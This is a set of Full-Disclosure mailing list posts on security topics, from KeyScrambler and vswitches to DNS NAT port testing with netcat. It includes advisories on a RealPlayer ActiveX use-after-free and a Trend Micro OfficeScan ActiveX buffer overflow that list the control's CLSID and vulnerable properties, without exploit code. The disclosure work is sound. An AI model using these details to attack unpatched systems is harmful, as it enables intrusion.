>> The .js files version check and create an instance of
>keyscrambler.sys
>> with the current firefox window passed to it as an argument.
>>
>> I also extracted the contents of the executable; setup.exe.
>> Setup.exe contained various dll's and one sys file. I presumed
>this
>> sys file; keyscrambler.sys, is the driver and main component of
>this
>> addon.
>> To confirm I monitored the running of setup.exe.
>>
>> My preumption was correct keyscrambler.sys is installed in
>system32
>> folder and is registered as an autostarting service, although it
>is hidden
>> from the services pane in computer management.
>>
>> This is where my "skills" bottom out. ASM is something I have
>not yet
>> got my head around.
>> I have a clue, but that's about all I do have... in time ;-)
>>
>> Thanks for your advice and input
>> regards
>> Dave
>>
>>
>> > On Thu, Dec 9, 2010 at 11:23 AM, mrx > > wrote:
>>
>> > On 08/12/2010 11:30, Tim Gurney wrote:
>>  Hi
>> 
>>  This seems to contradict itself somewhat. A plugin to
>firefox should
>>  have no way to encrypt things at a driver level within the
>> kernel, that
>>  would require installing seperate software at the root
>level, a
>> plugin
>>  should not be able to do this and i would be VERY worried
>and
>> surprised
>>  if it could as it would mean bypassing the security of the
>OS.
>>
>> > I tried installing this plugin to Firefox 3.6.12 in a
>virtualbox
>> XP32(SP3)
>> > environment and it is incompatible.
>> > I may wait for an update to the plugin and analyse its
>behaviour,
>> providing
>> > my curiosity doesn't wane in the meantime.
>>
>> > I am not a professional, I do this kind of research as a hobby
>and for
>> > educational purposes, when I have some free time.
>>
>>
>>  Also if the driver is encrypting the key strokes and the
>plugin is
>>  decrypting, what about all the keystrokes that are not in
>> firefox, like
>>  email, word processing, programming, there is nothing to
>decrypt
>> these
>>  so you would end up only ever being able to use firefox on
>the
>> machine
>>  and nothing else every again.
>>
>> > The devs do state that it only encrypts keystrokes in Firefox
>and
>> not other
>> > applications, although they do sell a version that supposedly
>works
>> > "in over 160 browsers and applications".
>> 
>>  personally I would not touch this with a barge pole and I
>would
>> do a lot
>>  more more digging and checking into this.
>>
>> > Yes, I am sceptical of claims, hence the post to this list.
>>
>>
>>
>>  regards
>> 
>>  Tim
>>
>>
>> > Thanks for your input
>> > Dave.
>>
>>
>> 
>>  On 08/12/10 11:12, mrx wrote:
>> > Hi list,
>> 
>> > Is anyone familiar with the firefox addon KeyScrambler?
>According to
>> > developers this encrypts keystrokes.
>> 
>> > Quote:
>> > "How KeyScrambler Works:
>> > When you type on your keyboard, the keys travel along a
>path
>> within the
>> > operating system before it arrives at your browser. Keyloggers
>plant
>> > themselves along this path and observe and record your
>> keystrokes. The
>> > collected information is then sent to the criminals who will
>use it to
>> > steal from you.
>> 
>> > KeyScrambler defeats keyloggers by encrypting your
>keystrokes at the
>> > keyboard driver level, deep within the operating system. When
>the
>> encrypted
>> > keystrokes reach your browser, KeyScrambler then decrypts
>them
>> so you
>> > see exactly the keys you've typed. Keyloggers can only record
>the
>> > encrypted keys, which are completely indecipherable."
>> 
>> > Can this be trusted? As in trusted I mean not bypassed.
>> 
>> > Input from the professional

Re: [Full-disclosure] vswitches: physical networks obsolete?

2011-02-07 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

We grappled with the same problem when setting up a virtual host in
order to mimic our production environment for training purposes.
Ultimately, we ended up purchasing a separate box for our DMZ host,
it is hard to trust separation in software(granted we are relying
on the firewall to do the very same thing, however, if you can't
trust your firewall to do what it was designed to do, then you have
bigger problem's than vSwitches) vs. a 10ft pole(physical
segregation). A vSwitch is essentially a like a single physical
switch, so...

Would you put your internal and DMZ networks on a single physical
switch, segregated via VLAN, relying on your FW to handle routing
and access control? Now (as you stated) add the fact that virtual
host owned = complete ownage whereas say owning a switch still
won't (necessarily) own the network(i.e IPSEC etc.), would you
still do it?

my .02

elazar

On Sun, 06 Feb 2011 09:47:39 -0500 phocean <0...@phocean.net> wrote:
>Hi all,
>
>I would like to get some feedback about the vswitches and how to
>deal
>with physical network separation.
>I have an idea about this but I would like to know the consensus
>of the
>security community to feel more confortable with it.
>
>There is a great article summing up the possible architectures:
>http://bradhedlund.com/2010/02/10/vswitch-illusion-dmz-
>virtualization/
>
>However, Brad carefully doesn't take position on whether physical
>separation of the DMZ is still a necessity.
>Somehow, as a Cisco employee, he may not be able to...
>
>He just mentions how vswitches are equivalent to VLAN on a
>physical
>switches and that the multiple vswitches on ESX are just an GUI
>illusion
>of physical separation. It is exactly the same code running in
>memory
>whether there is one or an infinite number of vswitches.
>
>Within the comments, one guy says physical networks are obsolete,
>but
>without stuff to support it.
>
>Personally, I am still convinced it is necessary and want to keep
>it
>like this :
>Internet--|FW|--[ESX/Nexus for DMZ]---|FW|---[ESX/Nexus for
>Secured LAN]
>
>I just can't trust the code and the idea of a single exploit
>compromising a whole datacenter is just frightening.
>
>I remember a black hat presentation that showed many ways to
>compromise
>the host.
>On the other hand, I couldn't find any good specifications or
>architecture documents from the editors describing their software
>design.
>It would be great to know what protections are in place to make
>exploits
>harder (memory management design, NX, randomization, MAC)...
>
>In short, what is your stake on it? Is physical networking
>obsolete and
>what can prove it is?
>
>Regards,
>- phocean
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAk1QTSgACgkQi04xwClgpZjyzQP+JOOGuFo3P0zgwzxUvIJfk7an+xwS
AL2h7gf2PDgpsd7XjzozjtEXa5dXhyFJMcPdIZIU1skPnggPq0SywzvenGGGOtT2kxAi
bj70s3XfdWYSEI8QiQGSrenZmvccBBDFL15APaBNIxn7OUEULyRTuPdAEsEIRvsgkoj/
KXQJ6NY=
=dphJ
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

(never start a sentence with)And just to be the grammar douche,
that should be:


With the latTer as the majority of course.



elazar
On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
 wrote:
>I agree, you should move your business to IRC. They usually cover
>everything
>from cute kittens imitating Barack Obama to troubled kids sharing
>theiruhpersonal photos...
>With the later as the majority of course. Oh, and if you want to
>be the
>coolest internet kid around, with best-of-breed language skillz,
>teh ircz iz
>foru.
>
>
>
>
>
>
>
>On Mon, Feb 21, 2011 at 8:19 PM, Jeffrey Walton
> wrote:
>
>> On Mon, Feb 21, 2011 at 2:11 PM, Cal Leeming [Simplicity Media
>Ltd]
>>  wrote:
>> > For accurate definitions of what trolling is, see this:
>> > http://www.urbandictionary.com/define.php?term=trolling
>> > Top definition is:
>> > "Being a prick on the internet because you can. Typically
>unleashing one
>> or
>> > more cynical or sarcastic remarks on an innocent by-stander,
>because it's
>> > the internet and, hey, you can."
>>
>> http://www.collegehumor.com/video:1926079
>>
>> [SNIP]
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAk1ixqsACgkQi04xwClgpZgscgP/at9GSVya75sXGU88KuTVqCalW6Lb
ucF1KjEntODf70pSdWd+WDJvfVb46BY5M7Md1oqD33VJ3RLZ2pcWv82r2W+0JIX24OIY
z8TY4ehSGY2xV1kI5HikFeqOEpebNcV4yLvkwE2hu+xdAi+JkPziWkRxUY7eTRGK+JFU
SJdMsDA=
=xPol
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No, just playing the stereotype...

On Mon, 21 Feb 2011 15:17:43 -0500 Christian Sciberras
 wrote:
>Interested in proof reading my texts? Might take a full time job
>though.
>
>No? Well, then shut it. :)
>
>
>
>
>
>
>On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> (never start a sentence with)And just to be the grammar douche,
>> that should be:
>>
>> 
>> With the latTer as the majority of course.
>> 
>>
>>
>> elazar
>> On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
>>  wrote:
>> >I agree, you should move your business to IRC. They usually
>cover
>> >everything
>> >from cute kittens imitating Barack Obama to troubled kids
>sharing
>> >theiruhpersonal photos...
>> >With the later as the majority of course. Oh, and if you want
>to
>> >be the
>> >coolest internet kid around, with best-of-breed language
>skillz,
>> >teh ircz iz
>> >foru.
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> >On Mon, Feb 21, 2011 at 8:19 PM, Jeffrey Walton
>> > wrote:
>> >
>> >> On Mon, Feb 21, 2011 at 2:11 PM, Cal Leeming [Simplicity
>Media
>> >Ltd]
>> >>  wrote:
>> >> > For accurate definitions of what trolling is, see this:
>> >> > http://www.urbandictionary.com/define.php?term=trolling
>> >> > Top definition is:
>> >> > "Being a prick on the internet because you can. Typically
>> >unleashing one
>> >> or
>> >> > more cynical or sarcastic remarks on an innocent by-
>stander,
>> >because it's
>> >> > the internet and, hey, you can."
>> >>
>> >> http://www.collegehumor.com/video:1926079
>> >>
>> >> [SNIP]
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAk1ixqsACgkQi04xwClgpZgscgP/at9GSVya75sXGU88KuTVqCalW6L
>b
>>
>ucF1KjEntODf70pSdWd+WDJvfVb46BY5M7Md1oqD33VJ3RLZ2pcWv82r2W+0JIX24OI
>Y
>>
>z8TY4ehSGY2xV1kI5HikFeqOEpebNcV4yLvkwE2hu+xdAi+JkPziWkRxUY7eTRGK+JF
>U
>> SJdMsDA=
>> =xPol
>> -END PGP SIGNATURE-
>>
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAk1izIwACgkQi04xwClgpZgIrgP/QWLR8pzikul2aNuZiVhVYoHLUUfj
PaHrERkl4a+e3KCzWZn86JSJ3MtPszrudGfZHjQCcgOgOydDBUKH10wq1/9VY5JMebNJ
bw6HpENCdtFmE074kqvSFkgpzW7zF4IgWWjybulRCI1I+leNlQae9HOgHQ9lO3VEECdE
D2hChgQ=
=GVyp
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad

I got an interesting issue with Internet Explorer(6 and 7 on 
Windows XP SP2) and proxy auto-configuration files. I was wondering 
if anyone has a similar setup and is experiencing behavior like 
this. My setup is as follows. Client machines are configured to use 
a PAC file via group policy. The pac file specifies a direct 
connection(via the DIRECT instruction) for a specific sub-net. The 
pac file is retrieved from a web server on the internal network. 
Now, when Internet Explorer connects to an external site, it 
normally is in the Internet Zone. Now, in this scenario, any 
external sites are ending up in the Local Intranet zone even though 
Internet Explorer is connecting directly to the external site(I 
have verified this through a packet capture). Logically, the DIRECT 
instruction should place any external sites in the Internet Zone, 
not Local Intranet, that is if Internet Explorer can properly 
differentiate what is on the local network or not. I guess if it 
can't then this whole issue is moot.

Elazar

--
Beauty Advice Just Got a Makeover
Read reviews about the beauty products you have always wanted to try
http://tagline.hushmail.com/fc/JKFkuIjyaQKkJn6hzADtsf0pDjSObjxzqmP3B6A3xnkgx01HUokFK4/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad

Probably, I completely missed that, and they do seem to be the 
defaults. I'll test it out tomorrow. Thanks Paul!

On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo 
<[EMAIL PROTECTED]> wrote:
>Elazar,
>
>> ... Internet Explorer [with] proxy auto-configuration ...
>> The pac file specifies a direct connection for a specific sub-
>net.
>> ... ending up in the Local Intranet zone ...
>
>When going to Tools InternetOptions Security LocalIntranet Sites,
>my IE7 has all of
>  Include all local (intranet) sites not listed in other zones
>  Include all sites that bypass the proxy server
>  Include all network paths (UNCs)
>selected/ticked. Would unticking the second (or all) fix this?
>(I do not know whether those are default settings; that last 
>setting
>seems dangerous or at least counter-intuitive.)
>
>Cheers,
>
>Paul Szabo   [EMAIL PROTECTED]   
>http://www.maths.usyd.edu.au/u/psz/
>School of Mathematics and Statistics   University of Sydney
>Australia

--
Make more on your investments with qualified asset management. Click now!
http://tagline.hushmail.com/fc/Ioyw6h4evKXg03CEgopwTNdnQbYruN1XDRoXeygf5lDZTlYV2lcP4c/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DNS and NAT (was: DNS and CheckPoint)

2008-07-11 Thread Elazar Broad

I can confirm the same behavior on a Cisco PIX 501 running 6.3(5). 
Port numbers are incremented sequentially by one...

On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]> 
wrote:
>Riad,
>
>Thanks for testing this. A number of other readers wrote me 
>privately
>confirming your result with linux ipchains. I'm not sure what 
>ipchains does
>when it encounters a collision, but in general I think this is a 
>good
>strategy. You'd have to have many thousands of simultaneous UDP
>transactions in order for randomly selected source ports to be 
>colliding
>frequently enough for it to present a substantial problem.
>On the other hand, I've also been contacted by readers who 
>confirm that
>other devices besides the one imipack mentioned share it's 
>behavior. There
>appears to be room for some research here into what collision 
>avoidance
>strategies are employed by different NAT devices, what happens to 
>those
>devices under high load, and what the security implications are.
>Fortunately, Linux appears to do a good job with this right now, 
>and
>provides an example approach that NAT vendors can look to.
>I'll post more if I have time to dig into this in further 
>detail.
>
>Regards,
>Tom Cross
>IBM X-Force
>
>
>
>   
>
> "Riad S. Wahby"   
>
> <[EMAIL PROTECTED]>
>
>   
> To 
> 07/10/2008 11:06  Thomas 
>Cross/Atlanta/[EMAIL PROTECTED]  
> PM
> cc 
>   full-
>[EMAIL PROTECTED]   
>   
>Subject 
>   Re: DNS and NAT (was: DNS 
>and   
>   CheckPoint) 
>
>   
>
>   
>
>   
>
>   
>
>   
>
>   
>
>
>
>
>
>Thomas Cross <[EMAIL PROTECTED]> wrote:
>>We've also been wondering whether NAT devices ought to 
>randomly assign
>>UDP source ports, although no NAT vendor that wea**re aware 
>of has
>done
>>this to date.
>
>Some quick testing implies that ipchains MASQUERADE-based NAT 
>doesn't
>suffer this problem because it preserves the source port.
>
>My test setup is as follows: call the computer inside the NAT 
>Alice, and
>the computer outside Bob.  Alice contacts Bob via Trent, a linux-
>based
>router, in my case a DLink DSL-2540B DSL modem / router combo.  On
>Alice, I run the following:
>
>( for j in $(seq 1 100); do i=$RANDOM; /bin/echo -n "$i "; echo $i 
>| nc -q
>0 -vv -p $i -u  ; sleep 1; done ) &> foo.Alice
>
>On Bob, I run
>
>( while true; do nc -vv -l -u -p  -q 0  
>foo.Bob
>
>At the end, I compare the actual source port in foo.Alice to the
>apparent source port in foo.Bob.  In my setup, they are always
>identical.
>
>Obviously it is impossible to guarantee that this will always be 
>the
>case; in order to identify dangerous corner cases one would have 
>to
>consult the ipchains code, but given the relative frailty of the
>randomized source port / randomized sequence number solution, for 
>a
>small number of computers behind a NAT (e.g., home users) I claim 
>that's
>a second-order danger at best.
>
>In a large production environment where there is a huge amount of 
>NAT
>traffic being generated one would do well to consider a solution 
>like
>Thomas's suggestion that the servers be moved outside the 
>firewall.
>
>-=rsw

--
Summer Spa Sweepstakes
Enter for your chance to WIN a Summer Spa Vacation!
http://tagline.hushmail.com/fc/JKFkuIjyZ14QRD38TWPhUMvEMpQVnOiPyd0fdp5F6wKWqgqAzEOhQE/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Oracle DB security contact email address?

2008-07-16 Thread Elazar Broad

[EMAIL PROTECTED]

http://osvdb.org/vendor/1/Oracle%20Corporation


On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen 
<[EMAIL PROTECTED]> wrote:
>Anyone have it?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Click to shop and compare great deals on trucks.
http://tagline.hushmail.com/fc/Ioyw6h4c7M0YoTpSYjieurxj3OY4o4jQmbGUnL8e5W6u0SurekzewY/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad

I could understand why Linus is against classifying a commit 
comment in his branch or in a any unstable branch for that 
matter...then again, the repositories are open, and anyone with 
half a brain might be able to discern what has security 
ramifications or not. On the other hand classifying commit comments 
in stable branch(es) is a must, and the lack of CVE identifiers is 
very troublesome. 

Well, if they aren't going to do it, its up to the community to 
point it out, get the issues tracked in SecurityFocus and the like 
so that people know that its out there and the distros along with 
the general public don't have to rely on "HIGHLY SUGGESTED THAT YOU 
UPGRADE" announcements from the kernel maintainers without knowing 
why.

Elazar

On Thu, 17 Jul 2008 06:57:57 -0400 Dave Aitel 
<[EMAIL PROTECTED]> wrote:
>I think what Brad and the Pax Team are saying here is that:
>1. We hold Linux to a higher standard than a company - we expect 
>the 
>term "open source" to apply to more than just the source code.
>2. For that reason, the community finds it discomforting when 
>kernel 
>maintainers know that a patch has a serious security ramification 
>and 
>essentially lie about it by neglecting to put that into the patch 
>comments. That's the sort of behavior we expect from a large 
>commercial 
>entity.
>3. This only hurts end users, because the hackers already know 
>about it.
>
>If the kernel maintainers had read the Microsoft team's SDL book, 
>they'd 
>probably be more up to speed on these things. :>
>
>-dave
>
>
>
>Brad Spengler wrote:
>| Valdis,
>|
>| Please try to stay consistent with your own arguments.  If you 
>defeat
>| them yourself barely into your third paragraph, you don't give 
>me much
>| to do!
>|
>| To summarize:
>|
>|> have any untrusted local users - for instance, my laptop.  The 
>only users
>|> on it are me, myself, and I<, and the guy that owned my 
>webserver, or
>| the guy that owned my email client, or the guy that owned my 
>audio
>| player, or the guy that owned my video player, or the guy that 
>owned my
>| web browser, or the guy that owned my FTP client, or the guy 
>that owned
>| my PDF reader, or the guy that owned my office application>
>|
>| You're a very trusting individual!
>|
>| This is exactly why telling someone to update if they have any
>| "untrusted local users" just doesn't make any sense since it 
>misleads a
>| majority of users.  A better replacement would be "if your 
>machine is
>| network-connected."  How do you own a website if you can't break 
>into it
>| directly?  Find out what other websites are hosted on the same 
>machine,
>| break into one of them, then locally escalate privileges, giving 
>you
>| access to all the websites hosted on the machine.  If you don't 
>think
>| this happens, you've got your head in the sand and honestly 
>should just
>| give up having anything to do with security.
>|
>| -Brad
>|
>| -
>|
>| ___
>| Dailydave mailing list
>| [EMAIL PROTECTED]
>| http://lists.immunitysec.com/mailman/listinfo/dailydave

--
Click for quotes on adjustable mortgages.
http://tagline.hushmail.com/fc/Ioyw6h4dOB3vJ6t2RHYfNNcMAdZxCoaJvTLB636Im56JbXVJrQ7UIQ/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad

Sorry if I was not clear enough, I meant in the commit comments. I 
agree, you need about a brain and a half to spot kernel bugs in the 
code itself...

On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl 
<[EMAIL PROTECTED]> wrote:
>--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad 
><[EMAIL PROTECTED]> 
>wrote:
>
>> I could understand why Linus is against classifying a commit
>> comment in his branch or in a any unstable branch for that
>> matter...then again, the repositories are open, and anyone with
>> half a brain might be able to discern what has security
>> ramifications or not.
>
>Apparently this isn't as true as you'd like to think.  If it were, 
>the folks 
>who write the code would have caught it to begin with.  After all, 
>anyone who 
>can write kernel code that works has *at least* half a brain, 
>wouldn't you say?
>
>The truth is, there is a very small pool of people smart enough, 
>educated 
>enough and familiar with the code in question enough to actually 
>spot security 
>problems in the code.  Those folks are worth their weight in gold, 
>but in many 
>cases they do it for the pure pleasure of finding the bugs.  They 
>also only 
>focus on those things that interest them, so the number of people 
>actually 
>looking for security issues in the LInux kernel code is 
>infinitesimally small 
>compared to the number of people who use the compiled product.
>
>Claiming that "anyone with half a brain" can spot security 
>problems in code 
>belittles both those who actually can and all those who cannot but 
>want to be 
>informed about them so they can protect themselves.
>
>-- 
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Click to become a master chef, own a restaurant and make millions.
http://tagline.hushmail.com/fc/Ioyw6h4eAFcOJbfoL5Wwa5NEmtU7vhJkF49lH3FbZ1YKdjbrwlfVgs/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] signature for DNS vulnerability?

2008-07-25 Thread Elazar Broad

Or this http://www.emergingthreats.net/content/view/87/1/

On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa" 
<[EMAIL PROTECTED]> wrote:
>check this out
>http://securabit.com/2008/07/24/latest-snort-signature-to-detect-
>dns-vulnerability/
>
>
>On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy frog
><[EMAIL PROTECTED]> wrote:
>> Hi All,
>>
>> Is is possible to write a snort rule for DNS
>vulnerability?please let
>> me know if anyone has it.
>>
>> Thanks,
>> _CF
>> http://secgeeks.com
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Click here for great computer networking solutions!
http://tagline.hushmail.com/fc/Ioyw6h4fM6mlHZiTX4SggXEziBupFkcfe2qP6fzDJuBUwzp58ntgQw/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Real Networks RealPlayer ActiveX Heap Use After Free Vulnerability

2008-07-25 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Real Networks

What:
RealPlayer 11 (11.0.0 - 11.0.2  builds 6.0.14.738 - 6.0.14.802)
RealPlayer 10.5 (6.0.12.1040-6.0.12.1663, 6.0.12.1698, 6.0.12.1741)
RealPlayer 10
RealPlayer Enterprise

How:
The WindowName and Controls properties of rmoc3260.dll do not
manage heap memory properly resulting in a use after free condition
which can overwrite heap management structures resulting in code
execution. Note that this is the same issue that affected the
Console property(which was fixed in Real Player 11.0.2/rmoc3260.dll
version 6.0.10.50, however these were not).

Fix:
Real Networks has released fixes for this issue, please see
http://service.real.com/realplayer/security/07252008_player/en/

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkiKMhgACgkQi04xwClgpZhFRAP9EEcawIxaC8gVfJhHKfNMj9/+xIfu
1Tqe5SayZCWSqO2vFdLdc6S9cRF72lcMbrnylnY4cmsVOyWUkCmU/cEup93BWt7LTbv1
c80pTPPxeTY2KTE+4ihrdFenVdlQuuwJfcG+krbtE1wV0NHeTzopEP1Cr0SqEajwquI7
obKXpek=
=/9UE
-END PGP SIGNATURE-

--
Click here for great computer networking solutions!
http://tagline.hushmail.com/fc/Ioyw6h4fM6mKzFsp60mMjxonRlOvNsnM1orMMvmhAPRxWsI1PtdJrC/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-28 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Trend Micro
http://www.trendmicro.com

What:
OfficeScan 7.3 build 1343(Patch 4) and older
http://www.trendmicro.com/download/product.asp?productid=5

How:
OfficeScan's Web Console utilizes several ActiveX controls when
deploying the product through the web interface. One of these
controls, objRemoveCtrl, is vulnerable to a stack-based buffer
overflow when embedded in a webpage. The one caveat to this issue
is that the control must be embedded in such a way that it CAN be
visible, i.e. obj = new ActiveXObject() will not work. The issue
lies in the code that is used to display certain properties and
their values on the control when it is embedded in a page.

OfficeScanRemoveCtrl.dll, version 7.3.0.1020
{5EFE8CB1-D095-11D1-88FC-0080C859833B}
Commonly located: systemdrive\Windows\Downloaded Program Files
CAB location on server: officescan install
path\OfficeScan\PCCSRV\Web_console\ClientInstall\RemoveCtrl.cab


The following properties are vulnerable:

HttpBased
LatestPatternServer
LatestPatternURL
LocalServerPort
MasterDirectory
MoreFiles
PatternFilename
ProxyLogin
ProxyPassword
ProxyPort
ProxyServer
RegistryINIFilename
Server
ServerIniFile
ServerPort
ServerSubDir
ServiceDisplayName
ServiceFilename
ServiceName
ShellExtensionFilename
ShortcutFileList
ShortcutNameList
UninstallPassword
UnloadPassword
UseProxy

Workaround:
Set the killbit for the affected control. See
http://support.microsoft.com/KB/240797

Fix:
As stated below, reportedly there are patches for this issue,
however, I have been able to exploit this issue in a test
environment running OfficeScan 7.3 patch 4(latest available patch).

Timeline:
06/27/2008 -> Vulnerability discovered and reported to iDefense
07/02/2008 <- Request for further information
07/16/2008 <- iDefense states that patches exist which resolve this
issue
07/16/2008 -> Request clarification regarding which patches resolve
this issue. No response
07/20/2008 -> Follow up regarding patches. No response
07/28/2008 - Disclosure
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkiN/hsACgkQi04xwClgpZiTrQP+M9MX2MgvLk+HaMgmYghBRQaTG89M
bb0RywlP2UY6/P9qIk0W3AfI1UsVZUPcTduvo+/BKIR7s5M/m+VTa74lEMH5FHQ17QZ6
tAAKI/TYGl7YWG/+4Zj7n8hpjIhT7AahtjbASTwUxSv3pFet/9DMM9nrCXolR0+bsajy
nJzOnmg=
=kQK+
-END PGP SIGNATURE-

--
Discover hidden treasures! Click now for a new metal detector!
http://tagline.hushmail.com/fc/Ioyw6h4c5jwe35WKO72pIZH3J68Qr1p1BCzmhxGSAr9zTajkwjyaNq/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-29 Thread Elazar Broad



On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad 
<[EMAIL PROTECTED]> wrote:
>Who:
>Trend Micro
>http://www.trendmicro.com
>
>What:
>OfficeScan 7.3 build 1343(Patch 4) and older
>http://www.trendmicro.com/download/product.asp?productid=5
>
>How:
>OfficeScan's Web Console utilizes several ActiveX controls when
>deploying the product through the web interface. One of these
>controls, objRemoveCtrl, is vulnerable to a stack-based buffer
>overflow when embedded in a webpage. The one caveat to this issue
>is that the control must be embedded in such a way that it CAN be
>visible, i.e. obj = new ActiveXObject() will not work. The issue
>lies in the code that is used to display certain properties and
>their values on the control when it is embedded in a page.
>
>OfficeScanRemoveCtrl.dll, version 7.3.0.1020
>{5EFE8CB1-D095-11D1-88FC-0080C859833B}
>Commonly located: systemdrive\Windows\Downloaded Program Files
>CAB location on server: officescan install
>path\OfficeScan\PCCSRV\Web_console\ClientInstall\RemoveCtrl.cab
>
>
>The following properties are vulnerable:
>
>HttpBased
>LatestPatternServer
>LatestPatternURL
>LocalServerPort
>MasterDirectory
>MoreFiles
>PatternFilename
>ProxyLogin
>ProxyPassword
>ProxyPort
>ProxyServer
>RegistryINIFilename
>Server
>ServerIniFile
>ServerPort
>ServerSubDir
>ServiceDisplayName
>ServiceFilename
>ServiceName
>ShellExtensionFilename
>ShortcutFileList
>ShortcutNameList
>UninstallPassword
>UnloadPassword
>UseProxy
>
>Workaround:
>Set the killbit for the affected control. See
>http://support.microsoft.com/KB/240797
>
>Fix:
>As stated below, reportedly there are patches for this issue,
>however, I have been able to exploit this issue in a test
>environment running OfficeScan 7.3 patch 4(latest available 
>patch).
>
>Timeline:
>06/27/2008 -> Vulnerability discovered and reported to iDefense
>07/02/2008 <- Request for further information
>07/16/2008 <- iDefense states that patches exist which resolve 
>this
>issue
>07/16/2008 -> Request clarification regarding which patches 
>resolve
>this issue. No response
>07/20/2008 -> Follow up regarding patches. No response
>07/28/2008 - Disclosure
